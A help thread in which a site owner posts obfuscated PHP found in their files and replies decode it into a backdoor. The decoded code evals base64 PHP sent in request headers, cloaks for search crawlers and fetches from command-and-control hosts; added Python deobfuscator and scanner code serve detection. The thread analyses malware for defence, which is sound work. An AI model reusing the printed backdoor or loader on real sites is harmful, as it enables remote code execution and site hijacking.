Hi, I need help. Today I have seen some strange code in my PHP file while making changes. The site is working fine, but I'm worried whether this may be a virus or not. Help with this.

```php
<?php /*versio:2.17*/
$IllI=0;
if (!function_exists('I111I1ll')){
    // Offset-addressed string table: every string the payload needs is base64 inside this
    // one blob, with junk characters between the fragments so it does not look like base64
    $GLOBALS['IllI'] = '=Y3VybAX2luaXQYWxsb3dfdXJsX2ZvcGVuX$O%DMQ{S?mPDaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cw}DX3NldG9wdAGediX2V4ZWMJndheT1jdXJsoYYSLwjb3Nvbi5pbg!EYS1pbi1hLWNpcmNsZS5jb20XJkcGhwYWlkZS5jb20dwWWWV8@}OgLZGlzcGxheV9lcnJvcnMSZGV0ZXJtaW5hdG9yUp^ZnRwMTMAMi4xNw~ebUVFPMDBRT08LYmFzZTY0X2RlY29kZQ}RAYmFzZTY0X2VuY29kZQwSFRUUF9IT1NU{dW5pb24c2VsZWN0MvnUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUVUVVFUllfU1RSSU5HsPHwj_PwoKVE1QG BVEVNUARVE1QRElSWRdG1wE)ld3AtY29udGVudC91cGxvYWRzLL.d3AtY29udGVudC9jYWNoZQdXBsb2FkX3RtcF9kaXIxL3RtcA(LgRodmVyc2lv_?kLQthLXBocAlbVSFRUUF9FWEVDUEhQb3V0b2swOSFRUUF9VU0VSX0FHRU5UGIwQLAZ29vZ2xlLHlhaG9vLGJpbmcsbXNuLGFzayxiYWlkdSxjcmF3bGVyLHlhbmRleA~d;L3BnLnBocD91PQbJms9JnQ9cGhwJnA9Z$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';
    function I111I1ll($a, $b){
        $c=$GLOBALS['IllI'];
        // pack('H*', '6261736536345f6465636f6465') spells "base64_decode"
        $d=pack('H*','6261736'.'536345f6465636f6465');
        return $d(substr($c, $a, $b));
    };
    // 16 base64 chars at offset 3239 give a 12-character function name; with the "/.../e"
    // pattern below that is preg_replace, whose /e modifier eval()s the replacement
    // (the modifier was removed in PHP 7.0)
    $IIII1l1I1 = I111I1ll(3239, 16);
    // Replacement = the second-stage PHP at offset 681, length 2558 (decoded in the replies below)
    $IIII1l1I1("/IllI1lI11/e", I111I1ll(681, 2558), "IllI1lI11");
};
?>
```

Thanks
Very interesting find. I'm this far into decoding it:

```php
<?php
if(!defined("determinator")){
    function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){
        $QOOOOO = microtime(true);
        return feof($Q0QO0Q);
    }
    function getfile($II1llI, $QQQ0Q0){
        $IllIIl = I111I1ll(1, 6);
        $III111 = $IllIIl.I111I1ll(7, 7);
        @ini_set(I111I1ll(14, 20), 1);
        if (@ini_get(I111I1ll(14, 20)) == I111I1ll(39, 2)){
            $Il1lI1=@file_get_contents(I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(57, 30));
            return $Il1lI1;
        } elseif (function_exists($III111)){
            $QQ00OQ = @$III111();
            $II1111 = $IllIIl.I111I1ll(89, 10);
            $QO00QO = $IllIIl.I111I1ll(103, 7);
            @$II1111($QQ00OQ, CURLOPT_URL, I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(110, 12));
            @$II1111($QQ00OQ, CURLOPT_HEADER,false);
            @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true);
            @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5);
            $I111II = @$QO00QO($QQ00OQ);
            @curl_close($QQ00OQ);
            if (empty($I111II)){ $I111II = I111I1ll(125, 0); }
            return $I111II;
        } else {
            $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5);
            if ($Q0QO0Q){
                $QOQ0QQ = I111I1ll(125, 0);
                $QOOOOO = NULL;
                @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n");
                $QQ0O0Q = PHP_OS.I111I1ll(126, 2).PHP_VERSION;
                @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n");
                while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){
                    $QOQ0QQ .= @fgets($Q0QO0Q, 128);
                }
                @fclose($Q0QO0Q);
                $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ);
                unset($Q0OO0Q[0]);
                return implode("\r\n\r\n", $Q0OO0Q);
            }
        }
    }
    $QO0Q00 = Array(I111I1ll(129, 10), I111I1ll(141, 23), I111I1ll(167, 15));
    function write($I11l1I,$I1I11l){
        if ($Q0OQQQ=@fopen($I11l1I,I111I1ll(182, 2))){
            @fwrite($Q0OQQQ,$I1I11l);
            @fclose($Q0OQQQ);
        }
    }
    function output($IlllII, $QOOQ00){
        echo I111I1ll(186, 3).$IlllII.I111I1ll(191, 2).$QOOQ00."\r\n";
    }
    @ini_set(I111I1ll(194, 19), 0);
    define(I111I1ll(214, 16), 1);
    $II1lll=I111I1ll(233, 7);
    $IlIllI=I111I1ll(241, 6);
    $I11l1l=I111I1ll(250, 11);
    $Q00OOQ=I111I1ll(262, 18);
    $Il1IIl=I111I1ll(283, 18);
    $II1llI=I111I1ll(47, 10);
    $II1llI.=strtolower(@$_SERVER[I111I1ll(302, 12)]);
    foreach ($_GET as $IlllII=>$QOOQ00){
        if (strpos($QOOQ00,I111I1ll(315, 7))){ $_GET[$IlllII]=I111I1ll(125, 0); }
        elseif (strpos($QOOQ00,I111I1ll(322, 8))){ $_GET[$IlllII]=I111I1ll(125, 0); }
    }
    if(!isset($_SERVER[I111I1ll(333, 15)])) {
        $_SERVER[I111I1ll(333, 15)] = @$_SERVER[I111I1ll(349, 15)];
        if(@$_SERVER[I111I1ll(365, 16)]) {
            $_SERVER[I111I1ll(333, 15)] .= I111I1ll(387, 2) . @$_SERVER[I111I1ll(365, 16)];
        }
    }
    if ($QQ0QOO=$II1llI.@$_SERVER[I111I1ll(333, 15)]){
        $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l);
        $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
        $IIlll1 = Array(
            @$_SERVER[I111I1ll(391, 4)], @$_SERVER[I111I1ll(398, 6)],
            @$_ENV[I111I1ll(391, 4)], @$_ENV[I111I1ll(405, 8)], @$_ENV[I111I1ll(398, 6)],
            $Il1Ill.I111I1ll(415, 4),
            $Il1Ill.I111I1ll(422, 24),
            $Il1Ill.I111I1ll(449, 22),
            @ini_get(I111I1ll(471, 19)),
            I111I1ll(491, 6),
        );
        foreach ($IIlll1 as $IIlI1I){
            if (!empty($IIlI1I)){
                $IIlI1I.=DIRECTORY_SEPARATOR;
                if (@is_writable($IIlI1I)){ $Il1Ill = $IIlI1I; break; }
            }
        }
        $tmp=$Il1Ill.I111I1ll(498, 2).$QOQOQO;
        if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){
            echo "\r\n";
            @output(I111I1ll(502, 8), $IlIllI.I111I1ll(513, 2).$II1lll.I111I1ll(517, 6));
            if ($QOOOOQ=$Q00OOQ(@$_SERVER[I111I1ll(526, 16)])){
                @eval($QOOOOQ);
                echo "\r\n";
                @output(I111I1ll(542, 4), I111I1ll(546, 3));
            }
            exit(0);
        }
        if (@is_file($tmp)){
            @touch($tmp);
            @include_once($tmp);
        } else{
            $QQ0QOO=@urlencode($QQ0QOO);
            $Illlll = @strtolower(@$_SERVER[I111I1ll(551, 20)]);
            foreach (explode(I111I1ll(575, 2), I111I1ll(577, 62)) as $III11l){
                if (strpos($Illlll, $III11l)!==False){
                    if (@touch($tmp)){
                        $QQQ0Q0 = I111I1ll(642, 14).$QQ0QOO.I111I1ll(657, 4).$QOQOQO.I111I1ll(661, 12).$II1lll.I111I1ll(675, 4).$IlIllI;
                        $I1lllI = getfile($QO0Q00[0], $QQQ0Q0);
                        @touch($tmp);
                    }
                    break;
                }
            }
        }
    }
}
?>
```
Which translates to:

```php
<?php
if(!defined("determinator")){
    function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){
        $QOOOOO = microtime(true);
        return feof($Q0QO0Q);
    }
    // Fetch http://<host><path> from the C2, trying file_get_contents, then curl, then a raw
    // socket. The curl function names are assembled at runtime so they never appear as literals.
    function getfile($II1llI, $QQQ0Q0){
        $IllIIl = "curl";
        $III111 = $IllIIl."_init";
        @ini_set("allow_url_fopen", 1);
        if (@ini_get("allow_url_fopen") == 1){
            $Il1lI1=@file_get_contents("http://" . $II1llI . $QQQ0Q0. "&way=file_get_contents");
            return $Il1lI1;
        } elseif (function_exists($III111)){
            $QQ00OQ = @$III111();
            $II1111 = $IllIIl."_setopt";
            $QO00QO = $IllIIl."_exec";
            @$II1111($QQ00OQ, CURLOPT_URL, "http://" . $II1llI . $QQQ0Q0. "&way=curl");
            @$II1111($QQ00OQ, CURLOPT_HEADER,false);
            @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true);
            @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5);
            $I111II = @$QO00QO($QQ00OQ);
            @curl_close($QQ00OQ);
            if (empty($I111II)){ $I111II = ""; }
            return $I111II;
        } else {
            $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5);
            if ($Q0QO0Q){
                $QOQ0QQ = "";
                $QOOOOO = NULL;
                @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n");
                $QQ0O0Q = PHP_OS."/".PHP_VERSION;   // OS and PHP version go to the C2 as User-Agent
                @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n");
                while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){
                    $QOQ0QQ .= @fgets($Q0QO0Q, 128);
                }
                @fclose($Q0QO0Q);
                $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ);
                unset($Q0OO0Q[0]);   // drop the response headers, keep the body
                return implode("\r\n\r\n", $Q0OO0Q);
            }
        }
    }
    // Command-and-control hosts; only the first is used below
    $QO0Q00 = Array("oson.in", "a-in-a-circle.com", "phpaide.com");
    function write($I11l1I,$I1I11l){
        if ($Q0OQQQ=@fopen($I11l1I,"w")){
            @fwrite($Q0OQQQ,$I1I11l);
            @fclose($Q0OQQQ);
        }
    }
    function output($IlllII, $QOOQ00){
        echo "Y_".$IlllII.":".$QOOQ00."\r\n";
    }
    @ini_set("display_errors", 0);
    define("determinator", 1);
    $II1lll="ftp13";           // build / campaign tag
    $IlIllI="2.17";            // version, matches the /*versio:2.17*/ header of the loader
    $I11l1l="QQO00QOO";        // salt for the per-site key
    $Q00OOQ="base64_decode";
    $Il1IIl="base64_encode";
    $II1llI="http://";
    $II1llI.=strtolower(@$_SERVER["HTTP_HOST"]);
    // Blank any GET parameter containing "union" or "select"
    foreach ($_GET as $IlllII=>$QOOQ00){
        if (strpos($QOOQ00,"union")){ $_GET[$IlllII]=""; }
        elseif (strpos($QOOQ00,"select")){ $_GET[$IlllII]=""; }
    }
    if(!isset($_SERVER["REQUEST_URI"])) {
        $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
        if(@$_SERVER["QUERY_STRING"]) {
            $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
        }
    }
    if ($QQ0QOO=$II1llI.@$_SERVER["REQUEST_URI"]){
        // Per-site key from host, version, OS and salt; it names the cache file and is
        // also the password for the header backdoor below
        $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l);
        $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
        // Candidate directories for the cache file; the first writable one wins
        $IIlll1 = Array(
            @$_SERVER["TMP"], @$_SERVER["TEMP"],
            @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"],
            $Il1Ill."tmp",
            $Il1Ill."wp-content/uploads",
            $Il1Ill."wp-content/cache",
            @ini_get("upload_tmp_dir"),
            "/tmp",
        );
        foreach ($IIlll1 as $IIlI1I){
            if (!empty($IIlI1I)){
                $IIlI1I.=DIRECTORY_SEPARATOR;
                if (@is_writable($IIlI1I)){ $Il1Ill = $IIlI1I; break; }
            }
        }
        $tmp=$Il1Ill.".".$QOQOQO;   // hidden file: "." followed by the md5 key
        // Backdoor: a request with "Y-Auth: <key>" and "ExecPHP: <base64 PHP>" gets eval()'d
        if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){
            echo "\r\n";
            @output("versio", $IlIllI."-".$II1lll."-php");
            if ($QOOOOQ=$Q00OOQ(@$_SERVER["HTTP_EXECPHP"])){
                @eval($QOOOOQ);
                echo "\r\n";
                @output("out", "ok");
            }
            exit(0);
        }
        // Everyone else: run whatever is in the cache file, if it exists
        if (@is_file($tmp)){
            @touch($tmp);
            @include_once($tmp);
        } else{
            // Cloaking: only when the User-Agent looks like a search-engine crawler,
            // create the cache file and report this page's URL and key to the C2
            $QQ0QOO=@urlencode($QQ0QOO);
            $Illlll = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
            foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler,yandex") as $III11l){
                if (strpos($Illlll, $III11l)!==False){
                    if (@touch($tmp)){
                        $QQQ0Q0 = "/pg.php?u=".$QQ0QOO."&k=".$QOQOQO."&t=php&p=".$II1lll."&v=".$IlIllI;
                        $I1lllI = getfile($QO0Q00[0], $QQQ0Q0);
                        @touch($tmp);
                    }
                    break;
                }
            }
        }
    }
}
?>
```

I am still trying to figure out what it does; it looks malicious. I'd remove it.
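The second-stage decoding in the post above is mechanical, so here is an added Python helper (my example, not code from the thread or from the malware) that automates it: it pulls the blob out of `$GLOBALS['IllI']`, reproduces PHP's lenient `base64_decode(substr(...))` for each `I111I1ll(offset, length)` call, and rewrites the calls as string literals so the payload reads like the translated version. It resolves the `pack('H*', ...)` trick that hides the name `base64_decode` the same way. The sample source is constructed from the loader shape and the first 57 characters of the blob as posted (the page truncates the rest), so only offsets inside that prefix decode; it also assumes the blob is a single-quoted string with no escaped quotes, which holds for this sample.

```python
"""Decode the I111I1ll(offset, length) scheme from the thread.

Every call is base64_decode(substr($blob, offset, length)) against one blob kept in
$GLOBALS, and the decoder's own name is built with pack('H*', ...) so that neither
'base64_decode' nor any string the payload uses appears literally in the file.
"""
import base64
import re

# Constructed sample: the loader shape from the thread with the first 57 characters of
# the real blob (the page truncates the rest), plus a few calls that fall inside that prefix.
SAMPLE_PHP = r"""<?php $IllI=0;if (!function_exists('I111I1ll')){$GLOBALS['IllI'] = '=Y3VybAX2luaXQYWxsb3dfdXJsX2ZvcGVuX$O%DMQ{S?mPDaHR0cDovLw';function I111I1ll($a, $b){$c=$GLOBALS['IllI']; $d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($c, $a, $b));};
$f = I111I1ll(1, 6).I111I1ll(7, 7); @ini_set(I111I1ll(14, 20), I111I1ll(39, 2)); $u = I111I1ll(47, 10); ?>"""

NOT_B64 = re.compile(r"[^A-Za-z0-9+/]")


def php_base64_decode(s: str) -> bytes:
    """Mimic PHP's non-strict base64_decode: ignore characters outside the alphabet
    (the blob has junk like '$O%{?' between real fragments) and accept missing '='
    padding, which Python's decoder would otherwise reject."""
    clean = NOT_B64.sub("", s)
    if len(clean) % 4 == 1:        # a lone trailing sextet carries no full byte
        clean = clean[:-1]
    return base64.b64decode(clean + "=" * (-len(clean) % 4))


def extract_blob(src: str, var: str = "IllI") -> str:
    """Pull the single-quoted blob assigned to $GLOBALS['<var>'] (assumption: no
    escaped quotes inside it, which holds for the sample in the thread)."""
    m = re.search(r"\$GLOBALS\['" + re.escape(var) + r"'\]\s*=\s*'([^']*)'", src)
    if not m:
        raise ValueError("blob assignment not found")
    return m.group(1)


def decode_call(blob: str, offset: int, length: int) -> str:
    """What I111I1ll(offset, length) returns for this blob."""
    return php_base64_decode(blob[offset:offset + length]).decode("latin-1")


def resolve_calls(src: str, func: str = "I111I1ll"):
    """Rewrite every func(<int>, <int>) as a PHP string literal. Returns the new
    source and a {(offset, length): decoded} table for reference."""
    blob = extract_blob(src)
    table = {}
    pattern = re.compile(re.escape(func) + r"\(\s*(\d+)\s*,\s*(\d+)\s*\)")

    def repl(m):
        a, b = int(m.group(1)), int(m.group(2))
        table[(a, b)] = text = decode_call(blob, a, b)
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"

    return pattern.sub(repl, src), table


def resolve_pack_hex(src: str) -> str:
    """Replace pack('H*','62..'.'..') (possibly split into concatenated pieces)
    with the string it spells, e.g. 'base64_decode'."""
    def repl(m):
        hexstr = "".join(re.findall(r"'([0-9a-fA-F]*)'", m.group(1)))
        return "'" + bytes.fromhex(hexstr).decode("latin-1") + "'"
    return re.sub(r"pack\('H\*',\s*((?:'[0-9a-fA-F]*'\s*\.?\s*)+)\)", repl, src)


if __name__ == "__main__":
    decoded, table = resolve_calls(resolve_pack_hex(SAMPLE_PHP))
    for (a, b), s in sorted(table.items()):
        print(f"I111I1ll({a}, {b}) -> {s!r}")
    print(decoded)
```

With the full blob from the infected file pasted in place of the sample, the same two passes turn the first post's loader into readable PHP; the `(681, 2558)` argument then yields the second stage, which contains its own `I111I1ll(...)` calls against the same blob and can be fed through `resolve_calls` again.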
Is this in the WordPress code? Yes, it's malicious code. Please remove it ASAP. Search for "defined("determinator")" on Google and you will get more details about it.
That said, it must be old, as "oson.in" is no longer an owned domain; so it was malicious code, but still remove it.
Rule of thumb! -- If code is not readable to a coder... or looks malicious... *rm -rf* remove the code! It's better to be safe than sorry.
It's usually code added automatically to some pages; it happened to me in the past as well. It will lead to Google marking your website as spam, and when someone clicks your link, Google will warn them there might be viruses on your website. It seems to be using sockets, so it's definitely calling some other page and maybe downloading or sending confidential data to them.
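Because this loader is typically injected into many files at once and drops a hidden cache file, removing the one copy you noticed is not enough. Here is an added Python scanner (my example, not a tool from the thread) that walks a web root for the indicators visible in the code above: a regex literal with the `/e` modifier as a call's first argument, `pack('H*', ...)`, a very long single-quoted blob, the `determinator` guard, the `Y-Auth`/`ExecPHP` header backdoor, `eval(`, the crawler list, and a file named `.` plus 32 hex digits in a writable directory. The web root it builds in a temporary directory is constructed for the demo, and the all-zero cache name is a placeholder, since the real one is `md5(host.version.OS.salt)`. Every hit is a reason to open the file, not proof on its own.

```python
"""Walk a web root for the tell-tales of the injected loader discussed in the thread.

Indicators (all taken from the code in the posts above):
  - a regex literal with the /e modifier as a call's first argument (eval via preg_replace)
  - pack('H*', ...) used to spell a function name from hex
  - a very long single-quoted, whitespace-free string (the offset-addressed blob)
  - the defined("determinator") guard, the Y-Auth / ExecPHP header backdoor, eval(
  - the crawler User-Agent list used for cloaking
  - a file named '.' + 32 hex digits in a writable directory (the dropped cache)
Each hit is a reason to open the file, not proof on its own.
"""
import os
import re
import tempfile

INDICATORS = {
    "regex_e_modifier": re.compile(r"\(\s*['\"]/[^'\"\n]*/[a-zA-Z]*e[a-zA-Z]*['\"]\s*,"),
    "packed_function_name": re.compile(r"pack\s*\(\s*['\"]H\*['\"]"),
    "long_string_blob": re.compile(r"'[^'\s]{500,}'"),
    "determinator_guard": re.compile(r"defined\s*\(\s*['\"]determinator['\"]\s*\)"),
    "header_backdoor": re.compile(r"HTTP_Y_AUTH|HTTP_EXECPHP"),
    "eval_call": re.compile(r"\beval\s*\("),
    "crawler_cloaking": re.compile(r"google,yahoo,bing", re.I),
}
HIDDEN_CACHE = re.compile(r"^\.[0-9a-f]{32}$")
PHP_EXT = (".php", ".phtml", ".inc")


def scan_source(text: str) -> list:
    """Names of the indicators present in one file's contents, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root: str) -> dict:
    """Map of relative path -> indicator names for every flagged file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            found = ["hidden_md5_cache"] if HIDDEN_CACHE.match(fn) else []
            if fn.lower().endswith(PHP_EXT):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found += scan_source(fh.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


# --- constructed sample web root for the demo (not real site content) ---
INJECTED_LOADER = (
    "<?php /*versio:2.17*/$IllI=0;if (!function_exists('I111I1ll')){$GLOBALS['IllI'] = '"
    + "=Y3VybAX2luaXQ" * 40          # stand-in for the 3000+ character blob
    + "';function I111I1ll($a, $b){$c=$GLOBALS['IllI']; "
    + "$d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($c, $a, $b));};"
    + "$p = I111I1ll(3239, 16);$p(\"/IllI1lI11/e\", I111I1ll(681, 2558), \"IllI1lI11\");};?>\n"
)
BENIGN_PAGE = (
    "<?php\n$q = $_GET['q'] ?? '';\n"
    "echo preg_replace('/\\s+/', ' ', htmlspecialchars($q));\n"   # ordinary regex, no /e
)
CACHE_NAME = "." + "0" * 32   # placeholder; the real name is '.' . md5(host.version.OS.salt)


def build_sample_tree(root: str) -> None:
    """Write one clean page, one page with the loader prepended, and a dropped cache file."""
    layout = {
        "index.php": BENIGN_PAGE,
        "wp-content/themes/x/header.php": INJECTED_LOADER + BENIGN_PAGE,
        "wp-content/uploads/" + CACHE_NAME: "<?php /* whatever the C2 served */ ?>",
    }
    for rel, body in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> dict:
    """Build the sample tree in a temp dir, scan it, return the hits."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, found in sorted(demo().items()):
        print(f"{path}: {', '.join(found)}")
```

Point `scan_tree` at the real document root after taking the site offline; the loader's cache file lives in whichever candidate directory was writable, so check `wp-content/uploads`, `wp-content/cache` and the system temp directories as well as the PHP files, and restore from a known-clean backup rather than hand-editing once you know the scope.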